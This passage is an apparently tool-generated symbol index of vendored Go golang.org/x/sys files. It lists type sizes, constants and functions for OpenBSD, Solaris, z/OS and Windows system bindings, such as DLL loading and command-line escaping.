SizeofSockaddrAny (line 230) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 231) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 232) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 233) | SizeofLinger = 0x8 constant SizeofIovec (line 234) | SizeofIovec = 0x10 constant SizeofIPMreq (line 235) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 236) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 237) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 238) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 239) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 240) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 241) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 245) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 246) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 247) | PTRACE_KILL = 0x8 type Kevent_t (line 250) | type Kevent_t struct type FdSet (line 259) | type FdSet struct constant SizeofIfMsghdr (line 264) | SizeofIfMsghdr = 0xa8 constant SizeofIfData (line 265) | SizeofIfData = 0x90 constant SizeofIfaMsghdr (line 266) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 267) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 268) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 269) | SizeofRtMetrics = 0x38 type IfMsghdr (line 272) | type IfMsghdr struct type IfData (line 287) | type IfData struct type IfaMsghdr (line 312) | type IfaMsghdr struct type IfAnnounceMsghdr (line 326) | type IfAnnounceMsghdr struct type RtMsghdr (line 336) | type RtMsghdr struct type RtMetrics (line 355) | type RtMetrics struct constant SizeofBpfVersion (line 371) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 372) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 373) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 374) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 375) | SizeofBpfHdr = 0x18 type BpfVersion (line 378) | type BpfVersion struct type BpfStat (line 383) | type BpfStat struct type BpfProgram (line 388) | type BpfProgram struct type BpfInsn (line 393) | type BpfInsn struct type BpfHdr (line 400) | type BpfHdr struct type BpfTimeval (line 411) | type BpfTimeval struct type Termios (line 416) | type Termios struct type Winsize (line 426) | type Winsize struct constant AT_FDCWD (line 434) | AT_FDCWD = -0x64 constant AT_EACCESS (line 435) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 436) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 437) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 438) | AT_REMOVEDIR = 0x8 type PollFd (line 441) | type PollFd struct constant POLLERR (line 448) | POLLERR = 0x8 constant POLLHUP (line 449) | POLLHUP = 0x10 constant POLLIN (line 450) | POLLIN = 0x1 constant POLLNVAL (line 451) | POLLNVAL = 0x20 constant POLLOUT (line 452) | POLLOUT = 0x4 constant POLLPRI (line 453) | POLLPRI = 0x2 constant POLLRDBAND (line 454) | POLLRDBAND = 0x80 constant POLLRDNORM (line 455) | POLLRDNORM = 0x40 constant POLLWRBAND (line 456) | POLLWRBAND = 0x100 constant POLLWRNORM (line 457) | POLLWRNORM = 0x4 type Sigset_t (line 460) | type Sigset_t type Utsname (line 462) | type Utsname struct constant SizeofUvmexp (line 470) | SizeofUvmexp = 0x158 type Uvmexp (line 472) | type Uvmexp struct constant SizeofClockinfo (line 561) | SizeofClockinfo = 0x10 type Clockinfo (line 563) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_ppc64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 78) | type Statfs_t struct type Flock_t (line 104) | type Flock_t struct type Dirent (line 112) | type Dirent struct type Fsid (line 122) | type Fsid struct constant PathMax (line 127) | PathMax = 0x400 type RawSockaddrInet4 (line 130) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 153) | type RawSockaddrDatalink struct type RawSockaddr (line 164) | type RawSockaddr struct type RawSockaddrAny (line 170) | type RawSockaddrAny struct type _Socklen (line 175) | type _Socklen type Linger (line 177) | type Linger struct type Iovec (line 182) | type Iovec struct type IPMreq (line 187) | type IPMreq struct type IPv6Mreq (line 192) | type IPv6Mreq struct type Msghdr (line 197) | type Msghdr struct type Cmsghdr (line 207) | type Cmsghdr struct type Inet6Pktinfo (line 213) | type Inet6Pktinfo struct type IPv6MTUInfo (line 218) | type IPv6MTUInfo struct type ICMPv6Filter (line 223) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 228) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 229) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 230) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 231) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 232) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 233) | SizeofLinger = 0x8 constant SizeofIovec (line 234) | SizeofIovec = 0x10 constant SizeofIPMreq (line 235) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 236) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 237) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 238) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 239) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 240) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 241) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 245) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 246) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 247) | PTRACE_KILL = 0x8 type Kevent_t (line 250) | type Kevent_t struct type FdSet (line 259) | type FdSet struct constant SizeofIfMsghdr (line 264) | SizeofIfMsghdr = 0xa8 constant SizeofIfData (line 265) | SizeofIfData = 0x90 constant SizeofIfaMsghdr (line 266) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 267) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 268) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 269) | SizeofRtMetrics = 0x38 type IfMsghdr (line 272) | type IfMsghdr struct type IfData (line 287) | type IfData struct type IfaMsghdr (line 312) | type IfaMsghdr struct type IfAnnounceMsghdr (line 326) | type IfAnnounceMsghdr struct type RtMsghdr (line 336) | type RtMsghdr struct type RtMetrics (line 355) | type RtMetrics struct type Mclpool (line 370) | type Mclpool struct constant SizeofBpfVersion (line 373) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 374) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 375) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 376) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 377) | SizeofBpfHdr = 0x18 type BpfVersion (line 380) | type BpfVersion struct type BpfStat (line 385) | type BpfStat struct type BpfProgram (line 390) | type BpfProgram struct type BpfInsn (line 395) | type BpfInsn struct type BpfHdr (line 402) | type BpfHdr struct type BpfTimeval (line 413) | type BpfTimeval struct type Termios (line 418) | type Termios struct type Winsize (line 428) | type Winsize struct constant AT_FDCWD (line 436) | AT_FDCWD = -0x64 constant AT_EACCESS (line 437) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 438) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 439) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 440) | AT_REMOVEDIR = 0x8 type PollFd (line 443) | type PollFd struct constant POLLERR (line 450) | POLLERR = 0x8 constant POLLHUP (line 451) | POLLHUP = 0x10 constant POLLIN (line 452) | POLLIN = 0x1 constant POLLNVAL (line 453) | POLLNVAL = 0x20 constant POLLOUT (line 454) | POLLOUT = 0x4 constant POLLPRI (line 455) | POLLPRI = 0x2 constant POLLRDBAND (line 456) | POLLRDBAND = 0x80 constant POLLRDNORM (line 457) | POLLRDNORM = 0x40 constant POLLWRBAND (line 458) | POLLWRBAND = 0x100 constant POLLWRNORM (line 459) | POLLWRNORM = 0x4 type Sigset_t (line 462) | type Sigset_t type Utsname (line 464) | type Utsname struct constant SizeofUvmexp (line 472) | SizeofUvmexp = 0x158 type Uvmexp (line 474) | type Uvmexp struct constant SizeofClockinfo (line 563) | SizeofClockinfo = 0x10 type Clockinfo (line 565) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_openbsd_riscv64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 78) | type Statfs_t struct type Flock_t (line 104) | type Flock_t struct type Dirent (line 112) | type Dirent struct type Fsid (line 122) | type Fsid struct constant PathMax (line 127) | PathMax = 0x400 type RawSockaddrInet4 (line 130) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 153) | type RawSockaddrDatalink struct type RawSockaddr (line 164) | type RawSockaddr struct type RawSockaddrAny (line 170) | type RawSockaddrAny struct type _Socklen (line 175) | type _Socklen type Linger (line 177) | type Linger struct type Iovec (line 182) | type Iovec struct type IPMreq (line 187) | type IPMreq struct type IPv6Mreq (line 192) | type IPv6Mreq struct type Msghdr (line 197) | type Msghdr struct type Cmsghdr (line 207) | type Cmsghdr struct type Inet6Pktinfo (line 213) | type Inet6Pktinfo struct type IPv6MTUInfo (line 218) | type IPv6MTUInfo struct type ICMPv6Filter (line 223) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 228) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 229) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 230) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 231) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 232) | SizeofSockaddrDatalink = 0x20 constant SizeofLinger (line 233) | SizeofLinger = 0x8 constant SizeofIovec (line 234) | SizeofIovec = 0x10 constant SizeofIPMreq (line 235) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 236) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 237) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 238) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 239) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 240) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 241) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 245) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 246) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 247) | PTRACE_KILL = 0x8 type Kevent_t (line 250) | type Kevent_t struct type FdSet (line 259) | type FdSet struct constant SizeofIfMsghdr (line 264) | SizeofIfMsghdr = 0xa8 constant SizeofIfData (line 265) | SizeofIfData = 0x90 constant SizeofIfaMsghdr (line 266) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 267) | SizeofIfAnnounceMsghdr = 0x1a constant SizeofRtMsghdr (line 268) | SizeofRtMsghdr = 0x60 constant SizeofRtMetrics (line 269) | SizeofRtMetrics = 0x38 type IfMsghdr (line 272) | type IfMsghdr struct type IfData (line 287) | type IfData struct type IfaMsghdr (line 312) | type IfaMsghdr struct type IfAnnounceMsghdr (line 326) | type IfAnnounceMsghdr struct type RtMsghdr (line 336) | type RtMsghdr struct type RtMetrics (line 355) | type RtMetrics struct type Mclpool (line 370) | type Mclpool struct constant SizeofBpfVersion (line 373) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 374) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 375) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 376) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 377) | SizeofBpfHdr = 0x18 type BpfVersion (line 380) | type BpfVersion struct type BpfStat (line 385) | type BpfStat struct type BpfProgram (line 390) | type BpfProgram struct type BpfInsn (line 395) | type BpfInsn struct type BpfHdr (line 402) | type BpfHdr struct type BpfTimeval (line 413) | type BpfTimeval struct type Termios (line 418) | type Termios struct type Winsize (line 428) | type Winsize struct constant AT_FDCWD (line 436) | AT_FDCWD = -0x64 constant AT_EACCESS (line 437) | AT_EACCESS = 0x1 constant AT_SYMLINK_NOFOLLOW (line 438) | AT_SYMLINK_NOFOLLOW = 0x2 constant AT_SYMLINK_FOLLOW (line 439) | AT_SYMLINK_FOLLOW = 0x4 constant AT_REMOVEDIR (line 440) | AT_REMOVEDIR = 0x8 type PollFd (line 443) | type PollFd struct constant POLLERR (line 450) | POLLERR = 0x8 constant POLLHUP (line 451) | POLLHUP = 0x10 constant POLLIN (line 452) | POLLIN = 0x1 constant POLLNVAL (line 453) | POLLNVAL = 0x20 constant POLLOUT (line 454) | POLLOUT = 0x4 constant POLLPRI (line 455) | POLLPRI = 0x2 constant POLLRDBAND (line 456) | POLLRDBAND = 0x80 constant POLLRDNORM (line 457) | POLLRDNORM = 0x40 constant POLLWRBAND (line 458) | POLLWRBAND = 0x100 constant POLLWRNORM (line 459) | POLLWRNORM = 0x4 type Sigset_t (line 462) | type Sigset_t type Utsname (line 464) | type Utsname struct constant SizeofUvmexp (line 472) | SizeofUvmexp = 0x158 type Uvmexp (line 474) | type Uvmexp struct constant SizeofClockinfo (line 563) | SizeofClockinfo = 0x10 type Clockinfo (line 565) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_solaris_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 constant PathMax (line 14) | PathMax = 0x400 constant MaxHostNameLen (line 15) | MaxHostNameLen = 0x100 type _C_short (line 19) | type _C_short type _C_int (line 20) | type _C_int type _C_long (line 21) | type _C_long type _C_long_long (line 22) | type _C_long_long type Timespec (line 25) | type Timespec struct type Timeval (line 30) | type Timeval struct type Timeval32 (line 35) | type Timeval32 struct type Tms (line 40) | type Tms struct type Utimbuf (line 47) | type Utimbuf struct type Rusage (line 52) | type Rusage struct type Rlimit (line 71) | type Rlimit struct type _Gid_t (line 76) | type _Gid_t type Stat_t (line 78) | type Stat_t struct type Flock_t (line 95) | type Flock_t struct type Dirent (line 105) | type Dirent struct type _Fsblkcnt_t (line 113) | type _Fsblkcnt_t type Statvfs_t (line 115) | type Statvfs_t struct type RawSockaddrInet4 (line 131) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 138) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 147) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 152) | type RawSockaddrDatalink struct type RawSockaddr (line 162) | type RawSockaddr struct type RawSockaddrAny (line 167) | type RawSockaddrAny struct type _Socklen (line 172) | type _Socklen type Linger (line 174) | type Linger struct type Iovec (line 179) | type Iovec struct type IPMreq (line 184) | type IPMreq struct type IPv6Mreq (line 189) | type IPv6Mreq struct type Msghdr (line 194) | type Msghdr struct type Cmsghdr (line 204) | type Cmsghdr struct type Inet4Pktinfo (line 210) | type Inet4Pktinfo struct type Inet6Pktinfo (line 216) | type Inet6Pktinfo struct type IPv6MTUInfo (line 221) | type IPv6MTUInfo struct type ICMPv6Filter (line 226) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 231) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 232) | SizeofSockaddrInet6 = 0x20 constant SizeofSockaddrAny (line 233) | SizeofSockaddrAny = 0xfc constant SizeofSockaddrUnix (line 234) | SizeofSockaddrUnix = 0x6e constant SizeofSockaddrDatalink (line 235) | SizeofSockaddrDatalink = 0xfc constant SizeofLinger (line 236) | SizeofLinger = 0x8 constant SizeofIovec (line 237) | SizeofIovec = 0x10 constant SizeofIPMreq (line 238) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 239) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 240) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 241) | SizeofCmsghdr = 0xc constant SizeofInet4Pktinfo (line 242) | SizeofInet4Pktinfo = 0xc constant SizeofInet6Pktinfo (line 243) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 244) | SizeofIPv6MTUInfo = 0x24 constant SizeofICMPv6Filter (line 245) | SizeofICMPv6Filter = 0x20 type FdSet (line 248) | type FdSet struct type Utsname (line 252) | type Utsname struct type Ustat_t (line 260) | type Ustat_t struct constant AT_FDCWD (line 269) | AT_FDCWD = 0xffd19553 constant AT_SYMLINK_NOFOLLOW (line 270) | AT_SYMLINK_NOFOLLOW = 0x1000 constant AT_SYMLINK_FOLLOW (line 271) | AT_SYMLINK_FOLLOW = 0x2000 constant AT_REMOVEDIR (line 272) | AT_REMOVEDIR = 0x1 constant AT_EACCESS (line 273) | AT_EACCESS = 0x4 constant SizeofIfMsghdr (line 277) | SizeofIfMsghdr = 0x54 constant SizeofIfData (line 278) | SizeofIfData = 0x44 constant SizeofIfaMsghdr (line 279) | SizeofIfaMsghdr = 0x14 constant SizeofRtMsghdr (line 280) | SizeofRtMsghdr = 0x4c constant SizeofRtMetrics (line 281) | SizeofRtMetrics = 0x28 type IfMsghdr (line 284) | type IfMsghdr struct type IfData (line 294) | type IfData struct type IfaMsghdr (line 315) | type IfaMsghdr struct type RtMsghdr (line 325) | type RtMsghdr struct type RtMetrics (line 340) | type RtMetrics struct constant SizeofBpfVersion (line 354) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 355) | SizeofBpfStat = 0x80 constant SizeofBpfProgram (line 356) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 357) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 358) | SizeofBpfHdr = 0x14 type BpfVersion (line 361) | type BpfVersion struct type BpfStat (line 366) | type BpfStat struct type BpfProgram (line 373) | type BpfProgram struct type BpfInsn (line 378) | type BpfInsn struct type BpfTimeval (line 385) | type BpfTimeval struct type BpfHdr (line 390) | type BpfHdr struct type Termios (line 398) | type Termios struct type Termio (line 407) | type Termio struct type Winsize (line 417) | type Winsize struct type PollFd (line 424) | type PollFd struct constant POLLERR (line 431) | POLLERR = 0x8 constant POLLHUP (line 432) | POLLHUP = 0x10 constant POLLIN (line 433) | POLLIN = 0x1 constant POLLNVAL (line 434) | POLLNVAL = 0x20 constant POLLOUT (line 435) | POLLOUT = 0x4 constant POLLPRI (line 436) | POLLPRI = 0x2 constant POLLRDBAND (line 437) | POLLRDBAND = 0x80 constant POLLRDNORM (line 438) | POLLRDNORM = 0x40 constant POLLWRBAND (line 439) | POLLWRBAND = 0x100 constant POLLWRNORM (line 440) | POLLWRNORM = 0x4 type fileObj (line 443) | type fileObj struct type portEvent (line 451) | type portEvent struct constant PORT_SOURCE_AIO (line 460) | PORT_SOURCE_AIO = 0x1 constant PORT_SOURCE_TIMER (line 461) | PORT_SOURCE_TIMER = 0x2 constant PORT_SOURCE_USER (line 462) | PORT_SOURCE_USER = 0x3 constant PORT_SOURCE_FD (line 463) | PORT_SOURCE_FD = 0x4 constant PORT_SOURCE_ALERT (line 464) | PORT_SOURCE_ALERT = 0x5 constant PORT_SOURCE_MQ (line 465) | PORT_SOURCE_MQ = 0x6 constant PORT_SOURCE_FILE (line 466) | PORT_SOURCE_FILE = 0x7 constant PORT_ALERT_SET (line 467) | PORT_ALERT_SET = 0x1 constant PORT_ALERT_UPDATE (line 468) | PORT_ALERT_UPDATE = 0x2 constant PORT_ALERT_INVALID (line 469) | PORT_ALERT_INVALID = 0x3 constant FILE_ACCESS (line 470) | FILE_ACCESS = 0x1 constant FILE_MODIFIED (line 471) | FILE_MODIFIED = 0x2 constant FILE_ATTRIB (line 472) | FILE_ATTRIB = 0x4 constant FILE_TRUNC (line 473) | FILE_TRUNC = 0x100000 constant FILE_NOFOLLOW (line 474) | FILE_NOFOLLOW = 0x10000000 constant FILE_DELETE (line 475) | FILE_DELETE = 0x10 constant FILE_RENAME_TO (line 476) | FILE_RENAME_TO = 0x20 constant FILE_RENAME_FROM (line 477) | FILE_RENAME_FROM = 0x40 constant UNMOUNTED (line 478) | UNMOUNTED = 0x20000000 constant MOUNTEDOVER (line 479) | MOUNTEDOVER = 0x40000000 constant FILE_EXCEPTION (line 480) | FILE_EXCEPTION = 0x60000070 constant TUNNEWPPA (line 484) | TUNNEWPPA = 0x540001 constant TUNSETPPA (line 485) | TUNSETPPA = 0x540002 constant I_STR (line 487) | I_STR = 0x5308 constant I_POP (line 488) | I_POP = 0x5303 constant I_PUSH (line 489) | I_PUSH = 0x5302 constant I_LINK (line 490) | I_LINK = 0x530c constant I_UNLINK (line 491) | I_UNLINK = 0x530d constant I_PLINK (line 492) | I_PLINK = 0x5316 constant I_PUNLINK (line 493) | I_PUNLINK = 0x5317 constant IF_UNITSEL (line 495) | IF_UNITSEL = -0x7ffb8cca type strbuf (line 498) | type strbuf struct type Strioctl (line 504) | type Strioctl struct type Lifreq (line 511) | type Lifreq struct FILE: vendor/golang.org/x/sys/unix/ztypes_zos_s390x.go constant SizeofPtr (line 13) | SizeofPtr = 0x8 constant SizeofShort (line 14) | SizeofShort = 0x2 constant SizeofInt (line 15) | SizeofInt = 0x4 constant SizeofLong (line 16) | SizeofLong = 0x8 constant SizeofLongLong (line 17) | SizeofLongLong = 0x8 constant PathMax (line 18) | PathMax = 0x1000 constant SizeofSockaddrAny (line 22) | SizeofSockaddrAny = 128 constant SizeofCmsghdr (line 23) | SizeofCmsghdr = 12 constant SizeofIPMreq (line 24) | SizeofIPMreq = 8 constant SizeofIPv6Mreq (line 25) | SizeofIPv6Mreq = 20 constant SizeofICMPv6Filter (line 26) | SizeofICMPv6Filter = 32 constant SizeofIPv6MTUInfo (line 27) | SizeofIPv6MTUInfo = 32 constant SizeofLinger (line 28) | SizeofLinger = 8 constant SizeofSockaddrInet4 (line 29) | SizeofSockaddrInet4 = 16 constant SizeofSockaddrInet6 (line 30) | SizeofSockaddrInet6 = 28 constant SizeofTCPInfo (line 31) | SizeofTCPInfo = 0x68 type _C_short (line 35) | type _C_short type _C_int (line 36) | type _C_int type _C_long (line 37) | type _C_long type _C_long_long (line 38) | type _C_long_long type Timespec (line 41) | type Timespec struct type Timeval (line 46) | type Timeval struct type timeval_zos (line 51) | type timeval_zos struct type Tms (line 57) | type Tms struct type Time_t (line 64) | type Time_t type Utimbuf (line 66) | type Utimbuf struct type Utsname (line 71) | type Utsname struct type RawSockaddrInet4 (line 80) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 88) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 97) | type RawSockaddrUnix struct type RawSockaddr (line 103) | type RawSockaddr struct type RawSockaddrAny (line 109) | type RawSockaddrAny struct type _Socklen (line 114) | type _Socklen type Linger (line 116) | type Linger struct type Iovec (line 121) | type Iovec struct type IPMreq (line 126) | type IPMreq struct type IPv6Mreq (line 131) | type IPv6Mreq struct type Msghdr (line 136) | type Msghdr struct type Cmsghdr (line 146) | type Cmsghdr struct type Inet4Pktinfo (line 152) | type Inet4Pktinfo struct type Inet6Pktinfo (line 157) | type Inet6Pktinfo struct type IPv6MTUInfo (line 162) | type IPv6MTUInfo struct type ICMPv6Filter (line 167) | type ICMPv6Filter struct type TCPInfo (line 171) | type TCPInfo struct type _Gid_t (line 204) | type _Gid_t type rusage_zos (line 206) | type rusage_zos struct type Rusage (line 211) | type Rusage struct type Rlimit (line 230) | type Rlimit struct type PollFd (line 236) | type PollFd struct type Stat_t (line 242) | type Stat_t struct type Stat_LE_t (line 260) | type Stat_LE_t struct type Statvfs_t (line 305) | type Statvfs_t struct type Statfs_t (line 327) | type Statfs_t struct type direntLE (line 341) | type direntLE struct type Dirent (line 349) | type Dirent struct type FdSet (line 358) | type FdSet struct type Flock_t (line 363) | type Flock_t struct type Termios (line 371) | type Termios struct type Winsize (line 379) | type Winsize struct type W_Mnth (line 386) | type W_Mnth struct type W_Mntent (line 395) | type W_Mntent struct FILE: vendor/golang.org/x/sys/windows/dll_windows.go function syscall_loadlibrary (line 21) | func syscall_loadlibrary(filename *uint16) (handle Handle, err Errno) function syscall_getprocaddress (line 24) | func syscall_getprocaddress(handle Handle, procname *uint8) (proc uintpt... type DLLError (line 27) | type DLLError struct method Error (line 33) | func (e *DLLError) Error() string { return e.Msg } method Unwrap (line 35) | func (e *DLLError) Unwrap() error { return e.Err } type DLL (line 38) | type DLL struct method FindProc (line 79) | func (d *DLL) FindProc(name string) (proc *Proc, err error) { method MustFindProc (line 101) | func (d *DLL) MustFindProc(name string) *Proc { method FindProcByOrdinal (line 111) | func (d *DLL) FindProcByOrdinal(ordinal uintptr) (proc *Proc, err erro... method MustFindProcByOrdinal (line 130) | func (d *DLL) MustFindProcByOrdinal(ordinal uintptr) *Proc { method Release (line 139) | func (d *DLL) Release() (err error) { function LoadDLL (line 48) | func LoadDLL(name string) (dll *DLL, err error) { function MustLoadDLL (line 69) | func MustLoadDLL(name string) *DLL { type Proc (line 144) | type Proc struct method Addr (line 152) | func (p *Proc) Addr() uintptr { method Call (line 165) | func (p *Proc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) { type LazyDLL (line 208) | type LazyDLL struct method Load (line 222) | func (d *LazyDLL) Load() error { method mustLoad (line 255) | func (d *LazyDLL) mustLoad() { method Handle (line 263) | func (d *LazyDLL) Handle() uintptr { method NewProc (line 269) | func (d *LazyDLL) NewProc(name string) *LazyProc { function NewLazyDLL (line 274) | func NewLazyDLL(name string) *LazyDLL { function NewLazySystemDLL (line 281) | func NewLazySystemDLL(name string) *LazyDLL { type LazyProc (line 287) | type LazyProc struct method Find (line 298) | func (p *LazyProc) Find() error { method mustFind (line 322) | func (p *LazyProc) mustFind() { method Addr (line 332) | func (p *LazyProc) Addr() uintptr { method Call (line 346) | func (p *LazyProc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) { function initCanDoSearchSystem32 (line 356) | func initCanDoSearchSystem32() { function canDoSearchSystem32 (line 368) | func canDoSearchSystem32() bool { function isBaseName (line 373) | func isBaseName(name string) bool { function loadLibraryEx (line 389) | func loadLibraryEx(name string, system bool) (*DLL, error) { type errString (line 414) | type errString method Error (line 416) | func (s errString) Error() string { return string(s) } FILE: vendor/golang.org/x/sys/windows/env_windows.go function Getenv (line 14) | func Getenv(key string) (value string, found bool) { function Setenv (line 18) | func Setenv(key, value string) error { function Clearenv (line 22) | func Clearenv() { function Environ (line 26) | func Environ() []string { method Environ (line 33) | func (token Token) Environ(inheritExisting bool) (env []string, err erro... function Unsetenv (line 55) | func Unsetenv(key string) error { FILE: vendor/golang.org/x/sys/windows/eventlog.go constant EVENTLOG_SUCCESS (line 10) | EVENTLOG_SUCCESS = 0 constant EVENTLOG_ERROR_TYPE (line 11) | EVENTLOG_ERROR_TYPE = 1 constant EVENTLOG_WARNING_TYPE (line 12) | EVENTLOG_WARNING_TYPE = 2 constant EVENTLOG_INFORMATION_TYPE (line 13) | EVENTLOG_INFORMATION_TYPE = 4 constant EVENTLOG_AUDIT_SUCCESS (line 14) | EVENTLOG_AUDIT_SUCCESS = 8 constant EVENTLOG_AUDIT_FAILURE (line 15) | EVENTLOG_AUDIT_FAILURE = 16 FILE: vendor/golang.org/x/sys/windows/exec_windows.go function EscapeArg (line 23) | func EscapeArg(s string) string { function ComposeCommandLine (line 84) | func ComposeCommandLine(args []string) string { function DecomposeCommandLine (line 147) | func DecomposeCommandLine(commandLine string) ([]string, error) { function CommandLineToArgv (line 179) | func CommandLineToArgv(cmd *uint16, argc *int32) (argv *[8192]*[8192]uin... function CloseOnExec (line 185) | func CloseOnExec(fd Handle) { function FullPath (line 190) | func FullPath(name string) (path string, err error) { function NewProcThreadAttributeList (line 209) | func NewProcThreadAttributeList(maxAttrCount uint32) (*ProcThreadAttribu... method Update (line 232) | func (al *ProcThreadAttributeListContainer) Update(attribute uintptr, va... method Delete (line 238) | func (al *ProcThreadAttributeListContainer) Delete() { 